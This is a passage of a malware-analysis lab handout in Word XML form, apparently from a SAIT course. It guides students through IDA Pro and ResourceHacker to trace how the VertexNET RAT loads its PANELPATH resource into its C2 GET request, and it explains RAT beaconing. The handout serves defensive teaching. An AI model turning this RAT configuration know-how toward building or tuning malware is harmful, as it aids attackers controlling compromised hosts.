    <w:p w14:paraId="4B155522" w14:textId="787BA93F" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="009D4C43">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00AC33B9">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: DWORD Reference </w:t>
      </w:r>
      <w:r w:rsidR="00AC33B9">
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:t>ithin Called Function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6FDA2A" w14:textId="27891EEC" w:rsidR="005927A0" w:rsidRPr="009D4C43" w:rsidRDefault="00AC33B9" w:rsidP="009D4C43">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:spacing w:before="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0044631B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Source: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IDA Pro,</w:t>
      </w:r>
      <w:r w:rsidRPr="0044631B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2016. </w:t>
      </w:r>
      <w:r w:rsidR="009D4C43" w:rsidRPr="009D4C43">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Reproduced and used in accordance with the fair dealing provisions in section 29 of the Canadian Copyright Act for the purposes of education, research or private study. Further distribution may infringe copyright.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A112472" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="009D4C43" w:rsidRDefault="005927A0" w:rsidP="009D4C43">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:spacing w:before="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30A7C8CD" w14:textId="45C1FEE3" w:rsidR="00AC33B9" w:rsidRPr="00AC33B9" w:rsidRDefault="00AC33B9" w:rsidP="009D4C43">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="005927A0" w:rsidRPr="00AC33B9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ook at the cross-references to this value in this function </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="005927A0" w:rsidRPr="00AC33B9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> see whe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>re a value is assigned to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB0032E" w14:textId="3A731274" w:rsidR="005927A0" w:rsidRDefault="00AC33B9" w:rsidP="009D4C43">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
          <w:bar w:val="nil"/>
        </w:pBdr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DCBA883" wp14:editId="292EFF12">
            <wp:extent cx="4342921" cy="1052267"/>
            <wp:effectExtent l="0" t="0" r="635"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Screen Shot 2017-01-01 at 8.23.39 P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390676" cy="1063838"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="12700" cap="flat">
                      <a:noFill/>
                      <a:miter lim="400000"/>
                    </a:ln>
                    <a:effectLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0176C66B" w14:textId="401F9888" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="009D4C43">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00AC33B9">
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>: DWORD Being Assigned Value of EAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A195030" w14:textId="718E13B2" w:rsidR="00AC33B9" w:rsidRPr="009D4C43" w:rsidRDefault="00AC33B9" w:rsidP="009D4C43">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:spacing w:before="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0044631B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Source: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IDA Pro,</w:t>
      </w:r>
      <w:r w:rsidRPr="0044631B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2016. </w:t>
      </w:r>
      <w:r w:rsidR="009D4C43" w:rsidRPr="009D4C43">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Reproduced and used in accordance with the fair dealing provisions in section 29 of the Canadian Copyright Act for the purposes of education, research or private study. Further distribution may infringe copyright.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A6AE05" w14:textId="16D91901" w:rsidR="005927A0" w:rsidRPr="009D4C43" w:rsidRDefault="005927A0" w:rsidP="009D4C43">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:spacing w:before="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D7B2327" w14:textId="77777777" w:rsidR="00AC33B9" w:rsidRPr="009D4C43" w:rsidRDefault="005927A0" w:rsidP="009D4C43">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC33B9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Navigat</w:t>
      </w:r>
      <w:r w:rsidR="00AC33B9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC33B9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> to this address and scroll up </w:t>
      </w:r>
      <w:r w:rsidR="00AC33B9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>to see</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC33B9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> a string reference to a string</w:t>
      </w:r>
      <w:r w:rsidR="00AC33B9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395551DC" w14:textId="78007E82" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="009D4C43">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="172B74AC" wp14:editId="435E9ED4">
            <wp:extent cx="5022376" cy="980579"/>
            <wp:effectExtent l="0" t="0" r="6985"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Screen Shot 2017-01-01 at 9.03.26 PM.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149293" cy="1005359"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="12700" cap="flat">
                      <a:noFill/>
                      <a:miter lim="400000"/>
                    </a:ln>
                    <a:effectLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19323D7D" w14:textId="72969A28" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="009D4C43">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00AC33B9">
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: PANELPATH String Reference </w:t>
      </w:r>
      <w:r w:rsidR="00AC33B9">
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:t>ithin Referenced Assignment Function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376DB2B6" w14:textId="1BDABE08" w:rsidR="005927A0" w:rsidRPr="009D4C43" w:rsidRDefault="00AC33B9" w:rsidP="009D4C43">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:spacing w:before="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0044631B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Source: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IDA Pro,</w:t>
      </w:r>
      <w:r w:rsidRPr="0044631B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2016. </w:t>
      </w:r>
      <w:r w:rsidR="009D4C43" w:rsidRPr="009D4C43">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Reproduced and used in accordance with the fair dealing provisions in section 29 of the Canadian Copyright Act for the purposes of education, research or private study. Further distribution may infringe copyright.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066DC2D8" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="009D4C43" w:rsidRDefault="005927A0" w:rsidP="009D4C43">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:spacing w:before="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F69A4F2" w14:textId="77777777" w:rsidR="00AC33B9" w:rsidRDefault="005927A0" w:rsidP="009D4C43">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC33B9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>The first function call (</w:t>
      </w:r>
      <w:r w:rsidRPr="006A1EE3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t>sub_401400</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC33B9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">) is associated with string operations. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD879F6" w14:textId="7329E1B0" w:rsidR="005927A0" w:rsidRPr="00AC33B9" w:rsidRDefault="00AC33B9" w:rsidP="009D4C43">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="005927A0" w:rsidRPr="00AC33B9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>avigate to the second function call (</w:t>
      </w:r>
      <w:r w:rsidR="005927A0" w:rsidRPr="006A1EE3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t>sub_409360</w:t>
      </w:r>
      <w:r w:rsidR="005927A0" w:rsidRPr="00AC33B9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="005927A0" w:rsidRPr="00AC33B9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> see a reference to </w:t>
      </w:r>
      <w:r w:rsidR="003E09E6">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="005927A0" w:rsidRPr="00AC33B9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>FindResourceA Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACBB39F" w14:textId="77777777" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="009D4C43">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:spacing w:before="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B125272" wp14:editId="730941F7">
            <wp:extent cx="4438591" cy="656622"/>
            <wp:effectExtent l="0" t="0" r="635"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Screen Shot 2017-01-01 at 9.24.36 PM.p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620186" cy="683486"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="12700" cap="flat">
                      <a:noFill/>
                      <a:miter lim="400000"/>
                    </a:ln>
                    <a:effectLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B6D21F" w14:textId="7318B4EF" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="009D4C43">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 1</w:t>
      </w:r>
      <w:r w:rsidR="00916D25">
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>: FindResourceA API Call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62545C2A" w14:textId="5485D7F6" w:rsidR="00916D25" w:rsidRPr="009D4C43" w:rsidRDefault="00916D25" w:rsidP="009D4C43">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:spacing w:before="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0044631B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Source: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IDA Pro,</w:t>
      </w:r>
      <w:r w:rsidRPr="0044631B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2016. </w:t>
      </w:r>
      <w:r w:rsidR="009D4C43" w:rsidRPr="009D4C43">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Reproduced and used in accordance with the fair dealing provisions in section 29 of the Canadian Copyright Act for the purposes of education, research or private study. Further distribution may infringe copyright.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE5E4A9" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="009D4C43" w:rsidRDefault="005927A0" w:rsidP="009D4C43">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:spacing w:before="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A81CC42" w14:textId="270D25DC" w:rsidR="005927A0" w:rsidRPr="00916D25" w:rsidRDefault="00916D25" w:rsidP="009D4C43">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">You can infer from this call sequence </w:t>
      </w:r>
      <w:r w:rsidR="005927A0" w:rsidRPr="00916D25">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>that the PANELPATH resource is being looked up in a file. Executable resources can be analyzed using ResourceHacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1085E7E8" w14:textId="7107917E" w:rsidR="005927A0" w:rsidRPr="00916D25" w:rsidRDefault="005927A0" w:rsidP="009D4C43">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00916D25">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:r w:rsidRPr="003E09E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ResourceHacker</w:t>
      </w:r>
      <w:r w:rsidR="001B2745">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and open the VertexNET sample. We briefly discussed Remote Access Trojans in class, but a quick summary is: A RAT is used by attackers to maintain some form of two-way control over an affected host. These are also known as backdoors, and this class of malware heavily relies on C2 servers as the attacker needs to provide new commands and functionality to the hosts they have compromised. These connections can be set to always on configurations, or the malware can “beacon-out” to a C2 server, and if the C2 server receives the beacon, a new connection can be established at that point.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1E6048" w14:textId="0BACA5D9" w:rsidR="005927A0" w:rsidRPr="00916D25" w:rsidRDefault="005927A0" w:rsidP="009D4C43">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00916D25">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Expand the </w:t>
      </w:r>
      <w:r w:rsidRPr="00916D25">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RCData</w:t>
      </w:r>
      <w:r w:rsidRPr="00916D25">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> segment and select</w:t>
      </w:r>
      <w:r w:rsidR="00916D25">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00916D25" w:rsidRPr="00916D25">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PANELPATH</w:t>
      </w:r>
      <w:r w:rsidR="00916D25">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3460A26B" w14:textId="77777777" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="009D4C43">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc472375413"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70414D51" wp14:editId="647DB450">
            <wp:extent cx="4442346" cy="235585"/>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Screen Shot 2017-01-01 at 9.51.52 PM.png"/>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922214" cy="261033"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="12700" cap="flat">
                      <a:noFill/>
                      <a:miter lim="400000"/>
                    </a:ln>
                    <a:effectLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="7A43AAE0" w14:textId="0AE0A177" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="009D4C43">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 1</w:t>
      </w:r>
      <w:r w:rsidR="00916D25">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>: PANELPATH Resource Hacker Value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E99E27" w14:textId="41103B81" w:rsidR="00916D25" w:rsidRPr="009D4C43" w:rsidRDefault="00916D25" w:rsidP="009D4C43">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:spacing w:before="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0044631B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Source: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Resource Hacker,</w:t>
      </w:r>
      <w:r w:rsidRPr="0044631B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2016. </w:t>
      </w:r>
      <w:r w:rsidR="009D4C43" w:rsidRPr="009D4C43">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Reproduced and used in accordance with the fair dealing provisions in section 29 of the Canadian Copyright Act for the purposes of education, research or private study. Further distribution may infringe copyright.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA9A3CC" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="009D4C43" w:rsidRDefault="005927A0" w:rsidP="009D4C43">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:spacing w:before="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25FD8AE6" w14:textId="3E5C3649" w:rsidR="005927A0" w:rsidRPr="00916D25" w:rsidRDefault="005927A0" w:rsidP="009D4C43">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00916D25">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>As you can see, this resource value corresponds to that of the URL path contacted within the GET request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC65F77" w14:textId="3714C270" w:rsidR="005927A0" w:rsidRPr="00916D25" w:rsidRDefault="00916D25" w:rsidP="009D4C43">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>You</w:t>
      </w:r>
      <w:r w:rsidR="005927A0" w:rsidRPr="00916D25">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> can infer that this resource is being loaded by this function, returned and assigned to this global variable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, which </w:t>
      </w:r>
      <w:r w:rsidR="005927A0" w:rsidRPr="00916D25">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">is then referenced in </w:t>
      </w:r>
      <w:r w:rsidR="005927A0" w:rsidRPr="00916D25">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t>0x408c36</w:t>
      </w:r>
      <w:r w:rsidR="005927A0" w:rsidRPr="00916D25">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> to be added to the GET request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77491DC3" w14:textId="76763BBF" w:rsidR="005927A0" w:rsidRPr="00916D25" w:rsidRDefault="005927A0" w:rsidP="009D4C43">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00916D25">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Not all dynamically resolved value functions are this complex. Use the referenced local variables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00916D25">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">being passed to </w:t>
      </w:r>
      <w:r w:rsidRPr="00916D25">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t>0x406a20</w:t>
      </w:r>
      <w:r w:rsidRPr="00916D25">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidRPr="00916D25">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t>EAX</w:t>
      </w:r>
      <w:r w:rsidRPr="00916D25">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> to answer the following questions</w:t>
      </w:r>
      <w:r w:rsidR="00916D25">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B07B142" w14:textId="30DEFE1B" w:rsidR="005927A0" w:rsidRPr="0018667E" w:rsidRDefault="00916D25" w:rsidP="0018667E">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:spacing w:before="360" w:after="120"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018667E">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Questions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01280EB7" w14:textId="3EF8F3BE" w:rsidR="005927A0" w:rsidRPr="00916D25" w:rsidRDefault="005927A0" w:rsidP="0018667E">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
